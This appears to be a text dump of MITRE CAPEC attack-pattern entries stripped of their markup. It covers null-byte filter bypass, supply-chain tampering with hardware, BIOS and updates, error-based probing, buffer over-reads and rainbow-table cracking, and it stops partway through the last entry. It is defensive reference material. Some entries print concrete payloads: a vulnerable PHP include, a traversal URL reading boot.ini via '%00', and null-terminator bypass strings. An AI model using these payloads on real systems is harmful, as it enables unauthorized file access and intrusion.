Successful exploitation requires that a payload be written such that certain areas of the input are URI acceptable. This includes initial injected instructions as well as certain overwritten addresses. This increases the complexity of successful exploitation. While not trivial, exploitation is definitely plausible [R.52.2].
CVE-2004-0629
Consider the following PHP script:
$whatever = addslashes($_REQUEST['whatever']);
include("/path/to/program/" . $whatever . "/header.htm");
A malicious attacker might open the following URL, disclosing the boot.ini file:
http://localhost/phpscript.php?whatever=../../../../boot.ini%00
Medium
Directory traversal
High
Execution of arbitrary code
Properly handle the NULL characters supplied as part of user input prior to doing anything with the data.
Integrity
Modify application data
Confidentiality
Read memory
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
158
Targeted
172
Targeted
173
Targeted
171
Targeted
74
Targeted
20
Targeted
697
Targeted
707
Targeted
1000
Attack Pattern
ChildOf
267
333
Category
HasMember
361
Reluctance to Trust
Penetration
Exploitation
High
High
High
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
Adobe Acrobat/Acrobat Reader ActiveX Control Buffer Overflow Vulnerability
iDefense Labs Public Advisory
Verisign, Inc.
August 13, 2004
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=126
PHP Input Validation Vulnerabilities
Bugtraq mailing list archive
http://msgs.securepoint.com/bugtraq/
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker with either direct access to the product assembly process or to the supply of subcomponents used in the product assembly process introduces counterfeit hardware components into product assembly. The assembly containing the counterfeit components results in a system specifically designed for malicious purposes.
The attacker will need either physical access or be able to supply malicious hardware components to the product development facility.
High
Low
The nature of these type of attacks involve a coordinated effort between well-funded multiple attackers, and sometimes require physical access to successfully complete an attack. As a result these types of attacks are not launched on a large scale against any potential victim, but are typically highly targeted against victims who are often targeted and may have rather sophisicated cyber defenses already in place.
A manufacturer of a firewall system requires a hardware card which functions as a multi-jack ethernet card with four ethernet ports. The attacker constructs a counterfeit card that functions normally except that packets from the attacker's network are allowed to bypass firewall processing completely. Once deployed at a victim location, this allows the attacker to bypass the firewall unrestricted.
High
Resources to maliciously construct components used by the manufacturer.
High
Resources to physically infiltrate manufacturer or manufacturer's supplier.
1000
Attack Pattern
ChildOf
438
John F. Miller
Supply Chain Attack Framework and Attack Patterns
The MITRE Corporation
2013
http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker with access to a manufacturer's hardware manufacturing process documentation alters the design specifications, which introduces flaws advantageous to the attacker once the system is deployed.
Advanced knowledge of hardware capabilities of a manufacturer's product.
Access to the manufacturer's documentation.
High
Low
The nature of these type of attacks involve a coordinated effort between well-funded multiple attackers, and sometimes require physical access to successfully complete an attack. As a result these types of attacks are not launched on a large scale against any potential victim, but are typically highly targeted against victims who are often targeted and may have rather sophisicated cyber defenses already in place.
To operate at full capability, a manufacturer's network intrusion detection device needs to have either a Intel Xeon E7-2820 or AMD FX-8350 which have 8 "cores" available, allowing for advanced threading needed to handle large volumes of network traffic without resorting to dropping packets from the detection process. The attacker alters the documentation to state that the system design must use the Intel Core Duo or the AMD Phenom II X2, which only have 2 cores, causing the system to drop large amounts of packets during deployment at a victim site with large amounts of network traffic.
High
Ability to read, interpret, and subsequently alter manufacturer's documentation to cause errors in design specifications.
High
Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation.
1000
Attack Pattern
ChildOf
438
John F. Miller
Supply Chain Attack Framework and Attack Patterns
The MITRE Corporation
2013
http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker replaces legitimate hardware in the system with faulty counterfeit or tampered hardware in the supply chain distribution channel, with purpose of causing malicious disruption or allowing for additional compromise when the system is deployed.
Physical access to the system after it has left the manufacturer but before it is deployed at the victim location.
High
Low
The nature of these type of attacks involve a coordinated effort between well-funded multiple attackers, and sometimes require physical access to successfully complete an attack. As a result these types of attacks are not launched on a large scale against any potential victim, but are typically highly targeted against victims who are often targeted and may have rather sophisicated cyber defenses already in place.
During shipment the attacker is able to intercept a system that has been purchased by the victim, and replaces a math processor card that functions just like the original, but contains advanced malicious capability. Once deployed, the system functions as normal, but allows for the attacker to remotely communicate with the system and use it as a conduit for additional compromise within the victim's environment.
High
Advanced knowledge of the design of the system.
High
Hardware creation and manufacture of replacement components.
1000
Attack Pattern
ChildOf
439
John F. Miller
Supply Chain Attack Framework and Attack Patterns
The MITRE Corporation
2013
http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker implants malicious software into the system in the supply chain distribution channel, with purpose of causing malicious disruption or allowing for additional compromise when the system is deployed.
Physical access to the system after it has left the manufacturer but before it is deployed at the victim location.
High
Low
The nature of these type of attacks involve a coordinated effort between well-funded multiple attackers, and sometimes require physical access to successfully complete an attack. As a result these types of attacks are not launched on a large scale against any potential victim, but are typically highly targeted against victims who are often targeted and may have rather sophisicated cyber defenses already in place.
An attacker has created a piece of malicious software designed to function as a backdoor in a system that is to be deployed at the victim location. During shipment of the system, the attacker has physical access to the system at a loading dock of an integrator for a short time. The attacker unpacks and powers up the system and installs the malicious piece of software, and configures it to run upon system boot. The system is repackaged and returned to its place on the loading dock, and is shipped and installed at the victim location with the malicious software in place, allowing the attacker to bypass firewalls and remotely gain access to the victim's network for further malicious activities.
High
Advanced knowledge of the design of the system and it's operating system components and subcomponents.
High
Malicious software creation.
1000
Attack Pattern
ChildOf
439
John F. Miller
Supply Chain Attack Framework and Attack Patterns
The MITRE Corporation
2013
http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker alters or establishes rogue processes in an integration facility in order to insert maliciously altered components into the system. The attacker would then supply the malicious components. This would allow for malicious disruption or additional compromise when the system is deployed.
Physical access to an integration facility that prepares the system before it is deployed at the victim location.
High
Low
The nature of these type of attacks involve a coordinated effort between well-funded multiple attackers, and sometimes require physical access to successfully complete an attack. As a result these types of attacks are not launched on a large scale against any potential victim, but are typically highly targeted against victims who are often targeted and may have rather sophisicated cyber defenses already in place.
An attacker gains access to a system integrator's documentation for the preparation of purchased systems designated for deployment at the victim's location. As a part of the preparation, the included 100 megabit network card is to be replaced with a 1 gigabit network card. The documentation is altered to reflect the type of 1 gigabit network card to use, and the attacker ensures that this type of network card is provided by the attacker's own supply. The card has additional malicious functionality which will allow for additional compromise by the attacker at the victim location once the system is deployed.
High
Advanced knowledge of the design of the system.
High
Hardware creation and manufacture of replacement components.
1000
Attack Pattern
ChildOf
439
John F. Miller
Supply Chain Attack Framework and Attack Patterns
The MITRE Corporation
2013
http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary may execute a flooding attack using XML messages with the intent to deny legitimate users access to a web service. These attacks are accomplished by sending a large number of XML based requests and letting the service attempt to parse each one.
This type of an attack requires the ability to generate a large amount of XML based messages to send to a target service.
1000
Attack Pattern
ChildOf
125
CAPEC Content Team
The MITRE Corporation
2014-06-23
Adversary uses malware or a similarly controlled application installed inside an organizational perimeter to gather information about the composition, configuration, and security mechanisms of a targeted application, system or network.
1000
Attack Pattern
ChildOf
169
CAPEC Content Team
The MITRE Corporation
2014-06-23
If a string is passed through a filter of some kind, then a terminal NULL may not be valid. Using alternate representation of NULL allows an attacker to embed the NULL mid-string while postfixing the proper data so that the filter is avoided. One example is a filter that looks for a trailing slash character. If a string insertion is possible, but the slash must exist, an alternate encoding of NULL in mid-string may be used.
An attacker first probes to figure out what restrictions on input are placed by filter, such as a specific characters on the end of the URL.
The attacker then injects a string of their choosing with a null terminator (using an alternate encoding such as %00), followed by a backslash (%5C), followed by some additional characters that are required to keep the filter happy
The malicious string then passes through the filter and passed to the underlying API. Everything after the null terminator is ignored. This may give an attacker the opportunity to access file system resources to which they should not have access and do other things.
Some popular forms in which this takes place:
PATH%00%5C
PATH[0x00][0x5C]
PATH[alternate encoding of the NULL][additional characters required to pass filter]
Null terminators are not properly handled by the filter.
High
High
Injection
A rather simple injection is possible in a URL:
http://getAccessHostname/sekbin/
helpwin.gas.bat?mode=&draw=x&file=x&module=&locale=[insert relative path here]
[%00][%5C]&chapter=
This attack has appeared with regularity in the wild. There are many variations of this kind of attack. Spending a short amount of time injecting against Web applications will usually result in a new exploit being discovered.
Medium
An attacker needs to understand alternate encodings, what the filter looks for and the data format acceptable to the target API
Test the program with various inputs and observe the behavior of the filter. Overtime it should be possible to understand what the filter is expecting.
Null characters are observed by the filter. The filter needs to be able to understand various encodings of the Null character, or only canonical data should be passed to it.
Properly handle Null characters. Make sure canonicalization is properly applied. Do not pass Null characters to the underlying APIs.
Assume all input is malicious. Create a white list that defines all valid input to the software system based on the requirements specifications. Input that does not match against the white list should not be permitted to enter into the system.
Integrity
Modify application data
Confidentiality
Read memory
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
158
Targeted
172
Targeted
173
Targeted
171
Targeted
74
Targeted
20
Targeted
697
Targeted
707
Targeted
1000
Attack Pattern
ChildOf
52
1000
Attack Pattern
ChildOf
267
Reluctance to Trust
Penetration
High
High
Low
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker provides a counterfeit component during the procurement process of a lower-tier component supplier to a sub-system developer or integrator, which is then built into the system being upgraded or repaired by the victim, allowing the attacker to cause disruption or additional compromise.
Advanced knowledge about the target system and sub-components.
High
Low
The nature of these type of attacks involve a coordinated effort between well-funded multiple attackers, and sometimes require physical access to successfully complete an attack. As a result these types of attacks are not launched on a large scale against any potential victim, but are typically highly targeted against victims who are often targeted and may have rather sophisicated cyber defenses already in place.
The attacker, aware that the victim has contracted with an integrator for system maintenance and that the integrator uses commercial-off-the-shelf network hubs, develops their own network hubs with a built-in malicious capability for remote access, the malicious network hubs appear to be a well-known brand of network hub but are not. The attacker then advertises to the sub-system integrator that they are a legit supplier of network hubs, and offers them at a reduced price to entice the integrator to purchase these network hubs. The integrator then installs the attacker's hubs at the victim's location, allowing the attacker to remotely compromise the victim's network.
High
Able to develop and manufacture malicious system components that resemble legitimate name-brand components.
1000
Attack Pattern
ChildOf
440
John F. Miller
Supply Chain Attack Framework and Attack Patterns
The MITRE Corporation
2013
http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker substitutes a maliciously-altered hardware component for a tested and approved component to a sub-system developer or integrator, allowing for malicious hardware to end up and the victim's location once an upgrade or repair is performed. The attacker can then cause disruption or additional compromise.
Physical access to an sub-system developer or integration facility where hardware components are kept.
High
Low
The nature of these type of attacks involve a coordinated effort between well-funded multiple attackers, and sometimes require physical access to successfully complete an attack. As a result these types of attacks are not launched on a large scale against any potential victim, but are typically highly targeted against victims who are often targeted and may have rather sophisicated cyber defenses already in place.
An attacker has access to the warehouse of a manufacturer of card readers being included as a part of an overall security system upgrade being offered by a security company under contract with the victim location. By replacing a critical hardware component in the card readers being shipped to the security company, the attacker is able to alter the function of the card reader to allow an attacker-supplied card to bypass a security checkpoint. The card reader is shipped to the security company, who in turn sells the upgrade to the victim and the upgrade is installed at the victim's location. The attacker is then able to go to the victim and use their own card and bypass a physical security checkpoint and gain access to the victim's location for further malicious activity.
High
Able to develop and manufacture malicious system components that perform the same functions and processes as their non-malicious counterparts.
1000
Attack Pattern
ChildOf
440
John F. Miller
Supply Chain Attack Framework and Attack Patterns
The MITRE Corporation
2013
http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker with access to download and update system software sends a maliciously altered BIOS to the victim or victim supplier/integrator, which when installed allows for future exploitation.
Advanced knowledge about the installed target system design.
Advanced knowledge about the download and update installation processes.
Access to the download and update system(s) used to deliver BIOS images.
High
Low
The nature of these type of attacks involve a coordinated effort between well-funded multiple attackers, and sometimes require physical access to successfully complete an attack. As a result these types of attacks are not launched on a large scale against any potential victim, but are typically highly targeted against victims who are often targeted and may have rather sophisicated cyber defenses already in place.
An attacker compromises the download and update portion of a manufacturer's web presence, and develops a malicious BIOS that in addition to the normal functionality will also at a specific time of day disable the remote access subsystem's security checks. The malicious BIOS is put in place on the manufacturer's website, the victim location is sent an official-looking email informing the victim of the availability of a new BIOS with bug fixes and enhanced performance capabilities to entice the victim to install the new BIOS quickly. The malicious BIOS is downloaded and installed on the victim's system, which allows for additional compromise by the attacker.
High
Able to develop a malicious BIOS image with the original functionality as a normal BIOS image, but with added functionality that allows for later compromise and/or disruption.
1000
Attack Pattern
ChildOf
440
John F. Miller
Supply Chain Attack Framework and Attack Patterns
The MITRE Corporation
2013
http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker introduces malicious code to the victim's system by altering the payload of a software update, allowing for additional compromise or site disruption at the victim location.
Advanced knowledge about the download and update installation processes.
Advanced knowledge about the deployed system and its various software subcomponents and processes.
Access to the download and update system(s) used to deliver software updates.
High
Low
The nature of these type of attacks involve a coordinated effort between well-funded multiple attackers, and sometimes require physical access to successfully complete an attack. As a result these types of attacks are not launched on a large scale against any potential victim, but are typically highly targeted against victims who are often targeted and may have rather sophisicated cyber defenses already in place.
The attacker creates a malicious backdoor that can run on the victim's deployed system. The backdoor is added to the existing code that is being prepared for release to the manufacturer's customers, and is now a part of the update code. The code is signed and placed on the update server, the customers are notified. All customers including the victim upgrade to the latest version of software, and the attacker is then able to compromise the victim.
High
Able to develop malicious code that can used on the victim's system while maintaining normal functionality.
1000
Attack Pattern
ChildOf
440
John F. Miller
Supply Chain Attack Framework and Attack Patterns
The MITRE Corporation
2013
http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker introduces malicious code to the victim's system by altering hardware update or replacement components being provided to the victim, allowing for additional compromise or site disruption at the victim location.
Physical access to an sub-system developer or integration facility where hardware update or replacement components are kept.
High
Low
The nature of these type of attacks involve a coordinated effort between well-funded multiple attackers, and sometimes require physical access to successfully complete an attack. As a result these types of attacks are not launched on a large scale against any potential victim, but are typically highly targeted against victims who are often targeted and may have rather sophisicated cyber defenses already in place.
An attacker develops a malicious networking card that allows for normal function plus the addition of malicious functionality that is of benefit to the attacker. The attacker sends the victim an email stating that the existing networking card is faulty, and that the victim can order a replacement card free of charge. The victim orders the card, and the attacker sends the malicious networking card. The malicious networking card replaces the perfectly-functioning original networking card, and the attacker is able to take advantage of the additional malicious functionality to further compromise the victim's network.
High
Able to develop and manufacture malicious hardware components that perform the same functions and processes as their non-malicious counterparts.
1000
Attack Pattern
ChildOf
440
John F. Miller
Supply Chain Attack Framework and Attack Patterns
The MITRE Corporation
2013
http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker maliciously alters hardware components that will be sold on the gray market, allowing for victim disruption and compromise when the victim needs replacement hardware components for systems where the parts are no longer in regular supply from original suppliers, or where the hardware components from the attacker seems to be a great benefit from a cost perspective.
Physical access to a gray market reseller's hardware components supply, or the ability to appear as a gray market reseller to the victim's buyer.
High
Low
The nature of these type of attacks involve a coordinated effort between well-funded multiple attackers, and sometimes require physical access to successfully complete an attack. As a result these types of attacks are not launched on a large scale against any potential victim, but are typically highly targeted against victims who are often targeted and may have rather sophisicated cyber defenses already in place.
An attacker develops co-processor boards with malicious capabilities that are technically the same as a manufacturer's expensive upgrade to their flagship system. The victim has installed the manufacturer's base system without the expensive upgrade. The attacker contacts the victim and states they have the co-processor boards at a drastically-reduced price, falsely stating they were acquired from a bankruptcy liquidation of a company that had purchased them from the manufacturer. The victim after hearing the drastically reduced price decides to take advantage of the situation and purchases the upgrades from the attacker, and installs them. This allows the attacker to further compromis the victim.
High
Able to develop and manufacture malicious hardware components that perform the same functions and processes as their non-malicious counterparts.
1000
Attack Pattern
ChildOf
440
John F. Miller
Supply Chain Attack Framework and Attack Patterns
The MITRE Corporation
2013
http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker with access to data files and processes on a victim's system injects false data into critical operational data during configuration or recalibration, causing the victim's system to perform in a suboptimal manner that benefits the attacker.
The attacker must have previously compromised the victim's systems or have physical access to the victim's systems.
Advanced knowledge of software and hardware capabilities of a manufacturer's product.
High
Low
The nature of these type of attacks involve a coordinated effort between well-funded multiple attackers, and sometimes require physical access to successfully complete an attack. As a result these types of attacks are not launched on a large scale against any potential victim, but are typically highly targeted against victims who are often targeted and may have rather sophisicated cyber defenses already in place.
An attacker wishes to bypass a security system to access an additional network segment where critical data is kept. The attacker know that some configurations of the security system will allow for remote bypass under certain conditions, such as switching a specific parameter to a different value. The attacker knows the bypass will work but be detected within the logging data of the security system. The attacker waits until an upgrade is performed to the security system by the victim's system administrators, and the attacker has access to an external logging system. The attacker injects false log entries that cause the administrators to think there are two different error states within the security system - one involving the specific parameter and the other involving the logging entries. The specific parameter is adjusted to a different value, and the logging level is reduced to a lower level that will not cause an attacker bypass to be detected. The attacker stops injecting false log data, and the administrators of the security system believe the issues were caused by the upgrade and are now resolved. The attacker is then able to bypass the security system.
High
Ability to generate and inject false data into operational data into a system with the intent of causing the victim to alter the configuration of the system.
1000
Attack Pattern
ChildOf
440
John F. Miller
Supply Chain Attack Framework and Attack Patterns
The MITRE Corporation
2013
http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker, leveraging the ability to manipulate components of primary support systems and tools within the development and production environments, inserts malicious software within the hardware and/or firmware development environment. The infiltration purpose is to alter developed hardware components in a system destined for deployment at the victim's organization, for the purpose of disruption or further compromise.
The victim must use email or removable media from systems running the IDE (or systems adjacent to the IDE systems).
The victim must have a system running exploitable applications and/or a vulnerable configuration to allow for initial infiltration.
The attacker must have working knowledge of some if not all of the components involved in the IDE system as well as the infrastructure.
High
Low
The nature of these type of attacks involve a coordinated effort between well-funded multiple attackers, and sometimes require physical access to successfully complete an attack. As a result these types of attacks are not launched on a large scale against any potential victim, but are typically highly targeted against victims who are often targeted and may have rather sophisicated cyber defenses already in place.
The attacker, knowing the manufacturer runs email on a system adjacent to the hardware development systems used for hardware and/or firmware design, sends a phishing email with a malicious attachment to the manufacturer. When viewed, the malicious attachment installs a backdoor that allows the attacker to remotely compromise the adjacent hardware development system from the manufacturer's workstation. The attacker is then able to exfiltrate and alter sensitive data on the hardware system, allowing for future compromise once the developed system is deployed at the victim location.
Medium
Intelligence about the manufacturer's operating environment and infrastructure.
High
Ability to develop, deploy, and maintain a stealth malicious backdoor program remotely in what is essentially a hostile environment.
High
Development skills to construct malicious attachments that can be used to exploit vulnerabilities in typical desktop applications or system configurations. The malicious attachments should be crafted well enough to bypass typical defensive systems (IDS, anti-virus, etc)
1000
Attack Pattern
ChildOf
438
John F. Miller
Supply Chain Attack Framework and Attack Patterns
The MITRE Corporation
2013
http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker with access to an open source code project and knowledge of its particular use for in a system being developed, manufactured, or supported for the victim, can insert malicious code into the open source software used for math libraries in anticipation of inclusion into the system for the purpose of disruption or further compromise within the victim organization.
Access to the open source code base being used by the manufacturer in a system being developed or currently deployed at a victim location.
High
Low
The nature of these type of attacks involve a coordinated effort between well-funded multiple attackers, and sometimes require physical access to successfully complete an attack. As a result these types of attacks are not launched on a large scale against any potential victim, but are typically highly targeted against victims who are often targeted and may have rather sophisicated cyber defenses already in place.
An attacker with access to an open source code project introduces a hard-to-find bug in the software that allows under very specific conditions for encryption to be disabled on data streams. The attacker commits the change to the code which is picked up by a manufacturer who develops VPN software. It is eventually deployed at the victim's location where the very specific conditions are met, and the attacker is able to sniff plaintext traffic thought to be encrypted, allowing the attacker to gain access to sensitive data of the victim.
High
Advanced knowledge about the inclusion and specific usage of an open source code project within system being targeted for infiltration.
1000
Attack Pattern
ChildOf
441
John F. Miller
Supply Chain Attack Framework and Attack Patterns
The MITRE Corporation
2013
http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker with access to the development environment process of an application-specific integrated circuit (ASIC) for a victim system being developed or maintained after initial deployment can insert malicious functionality into the system for the purpose of disruption or further compromise.
The attacker must have working knowledge of some if not all of the components involved in the target system as well as the infrastructure and development environment of the manufacturer.
Advanced knowledge about the ASIC installed within the target system.
High
Low
The nature of these type of attacks involve a coordinated effort between well-funded multiple attackers, and sometimes require physical access to successfully complete an attack. As a result these types of attacks are not launched on a large scale against any potential victim, but are typically highly targeted against victims who are often targeted and may have rather sophisicated cyber defenses already in place.
A hardware manufacturer periodically updates its ASIC with new features. The attacker, knowing the manufacturer runs email on a system adjacent to the hardware development systems used for ASIC design, sends a phishing email with a malicious attachment to the manufacturer. When viewed, the malicious attachment installs a backdoor that allows the attacker to remotely compromise the adjacent ASIC development system. The attacker is then able to exfiltrate and alter sensitive data on the ASIC system, allowing for future compromise once a new AISC is deployed at the victim location.
High
Able to develop and manufacture malicious subroutines for an ASIC environment without degradation of existing functions and processes.
1000
Attack Pattern
ChildOf
441
John F. Miller
Supply Chain Attack Framework and Attack Patterns
The MITRE Corporation
2013
http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An Attacker, aware of an application's location (and possibly authorized to use the application) can probe the application's structure and evaluate its robustness by probing its error conditions (not unlike one would during a 'fuzz' test, but more purposefully here) in order to support attacks such as blind SQL injection, or for the more general task of mapping the application to mount another subsequent attack.
Determine user-controllable parameters of the application
Inject each parameter with content that causes an error condition to manifest
Modify the content of each parameter according to observed error conditions
Repeat above steps with enough parameters until the application has been sufficiently mapped out to launch desired attack (for example, Blind SQL Injection)
This class of attacks does not strictly require authorized access to the application. As Attackers use this attack process to classify, map, and identify vulnerable aspects of an application, it simply requires hypotheses to be verified, interaction with the application, and time to conduct trial-and-error activities.
Low
High
Injection
Brute Force
Blind SQL injection is an example of this technique, applied to successful exploit.
CVE-2006-4705
Attacker sends bad data at various servlets in a J2EE system, records returned exception stack traces, and maps application functionality.
In addition, this technique allows attackers to correlate those servlets used with the underlying open source packages (and potentially version numbers) that provide them.
Medium
Although fuzzing parameters is not difficult, and often possible with automated fuzzers, interpreting the error conditions and modifying the parameters so as to move further in the process of mapping the application requires detailed knowledge of target platform, the languages and packages used as well as software design.
The Attacker needs the ability to probe application functionality and provide it erroneous directives or data without triggering intrusion detection schemes or making enough of an impact on application logging that steps are taken against the attacker.
The Attack does not need special hardware, software, skills, or access.
Repeated errors generated by the same piece of code are an indication, although it requires careful monitoring of the application and its associated error logs, if any.
To defeat correlation, the attacker may try changing the origin IP addresses or client browser identification strings or start a new session from where he left off; any technique aimed at defeating the use of certain identification parameters for correlation goes a small way in obfuscating the attack.
Application designers can construct a 'code book' for error messages. When using a code book, application error messages aren't generated in string or stack trace form, but are cataloged and replaced with a unique (often integer-based) value 'coding' for the error. Such a technique will require helpdesk and hosting personnel to use a 'code book' or similar mapping to decode application errors/logs in order to respond to them normally.
Application designers can wrap application functionality (preferably through the underlying framework) in an output encoding scheme that obscures or cleanses error messages to prevent such attacks. Such a technique is often used in conjunction with the above 'code book' suggestion.
Confidentiality
Read application data
Read memory
User-controllable input
Content, based on application context, crafted to elicit error conditions from the application
Error Handling mechanism within the application
The impact of activation is an error condition that, hopefully for the attacker, reveals sufficient information to further map the application.
209
Targeted
248
Secondary
717
Targeted
1000
Attack Pattern
ChildOf
116
Custom error pages must be used to handle exceptions such that they do not reveal any information about the architecture of the application or the database.
Employ application-level safeguards to filter data and handle exceptions gracefully.
Failing Securely
Defense in Depth
Never Use Input as Part of a Directive to any Internal Component
Handle All Errors Safely
Reconnaissance
Medium
Medium
Low
All
All
All
All
Common Weakness Enumeration (CWE)
CWE-20 - Input Validation
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/20.html
Common Weakness Enumeration (CWE)
CWE-390 - Improper Error Handling
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/390.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary attacks a target by providing input that causes an application to read beyond the boundary of a defined buffer. This typically occurs when a value influencing where to start or stop reading is set to reflect positions outside of the valid memory location of the buffer. This type of attack may result in exposure of sensitive information, a system crash, or arbitrary code execution.
For this type of attack to be successful, a few prerequisites must be met. First, the targeted software must be written in a language that enables fine grained buffer control. (e.g., c, c++) Second, the targeted software must actually perform buffer operations and inadequately perform bounds-checking on those buffer operations. Finally, the adversary must have the capability to influence the input that guides these buffer operations.
High
Low
Confidentiality
Read memory
By reading outside the boundary of the intended buffer, the adversary is potentially able to see any data that is stored on the disk. This could include secret keys, personal information, and sensitive files.
Availability
DoS: crash / exit / restart
Depending on the use of the target buffer, an application or system crash can be achieved.
125
Targeted
CVE-2014-1895
Off-by-one error in the flask_security_avc_cachestats function in xsm/flask/flask_op.c in Xen 4.2.x and 4.3.x, when the maximum number of physical CPUs are in use, allows local users to cause a denial of service (host crash) or obtain sensitive information from hypervisor memory by leveraging a FLASK_AVC_CACHESTAT hypercall, which triggers a buffer over-read.
CVE-2014-0704
The IGMP implementation on Cisco Wireless LAN Controller (WLC) devices 4.x, 5.x, 6.x, 7.0 before 7.0.250.0, 7.1, 7.2, and 7.3, when IGMPv3 Snooping is enabled, allows remote attackers to cause a denial of service (memory over-read and device restart) via a crafted field in an IGMPv3 message, aka Bug ID CSCuh33240.
CVE-2014-0160
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
CVE-2013-6712
The scan function in ext/date/lib/parse_iso_intervals.c in PHP through 5.5.6 does not properly restrict creation of DateInterval objects, which might allow remote attackers to cause a denial of service (heap-based buffer over-read) via a crafted interval specification.
CVE-2004-0183
TCPDUMP 3.8.1 and earlier allows remote attackers to cause a denial of service (crash) via ISAKMP packets containing a Delete payload with a large number of SPI's, which causes an out-of-bounds read, as demonstrated by the Striker ISAKMP Protocol Test Suite.
1000
Attack Pattern
ChildOf
123
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary engages in fingerprinting activities to determine the type or version of an application installed on a remote target.
None
Low
1000
Attack Pattern
ChildOf
224
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary develops targeted malware that takes advantage of a known vulnerability in an organizational information technology environment. The malware crafted for these attacks is based specifically on information gathered about the technology environment. Successfully executing the malware enables an adversary to achieve a wide variety of negative technical impacts.
1000
Category
ChildOf
525
CAPEC Content Team
The MITRE Corporation
2014-06-23
Adversary creates duplicates of legitimate websites. When users visit a counterfeit site, the site can gather information or upload malware.
None
High
1000
Attack Pattern
ChildOf
194
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary creates a false front organizations with the appearance of a legitimate supplier in the critical life cycle path that then injects corrupted/malicious information system components into the organizational supply chain.
None
High
1000
Attack Pattern
ChildOf
194
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary who is authorized to send queries to a target sends variants of expected queries in the hope that these modified queries might return information beyond what the expected set of queries should provide.
1000
Attack Pattern
ChildOf
116
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary obtains unauthorized information due to insecure or incomplete data deletion in a multi-tenant environment. (e.g., in a cloud computing environment)
1000
Attack Pattern
ChildOf
116
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary conducts a physical attack a device or component, destroying it such that it no longer functions as intended.
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary contaminates organizational information systems (including devices and networks) by causing them to handle information of a classification/sensitivity for which they have not been authorized. The information is exposed to individuals who are not authorized access to such information, and the information system, device, or network is unavailable while the spill is investigated and mitigated.
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker gets access to the database table where hashes of passwords are stored. He then uses a rainbow table of pre-computed hash chains to attempt to look up the original password. Once the original password corresponding to the hash is obtained, the attacker uses the original password to gain access to the system.
A password rainbow table stores hash chains for various passwords. A password chain is computed, starting from the original password, P, via a reduce(compression) function R and a hash function H. A recurrence relation exists where Xi+1 = R(H(Xi)), X0 = P. Then the hash chain of length n for the original password P can be formed: X1, X2, X3, ... , Xn-2, Xn-1, Xn, H(Xn). P and H(Xn) are then stored together in the rainbow table.
Constructing the rainbow tables takes a very long time and is computationally expensive. A separate table needs to be constructed for the various hash algorithms (e.g. SHA1, MD5, etc.). However, once a rainbow table is computed, it can be very effective in cracking the passwords that have been hashed without the use of salt.
Determine application's/system's password policy
Determine the password policies of the target application/system.
Determine minimum and maximum allowed password lengths.
env-All
Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc.).
env-All
Determine account lockout policy (a strict account lockout policy will prevent brute force attacks).
env-All
Passwords are used in the application/system
env-All
Passwords are not used in the application/system
env-All
Obtain password hashes
An attacker gets access to the database table storing hashes of passwords or potentially just discovers a hash of an individual password.
Obtain copy of database table or flat file containing password hashes (by breaking access controls, using SQL Injection, etc.)
env-All
Obtain password hashes from platform-specific storage locations (e.g. Windows registry)
env-All
Sniff network packets containing password hashes.
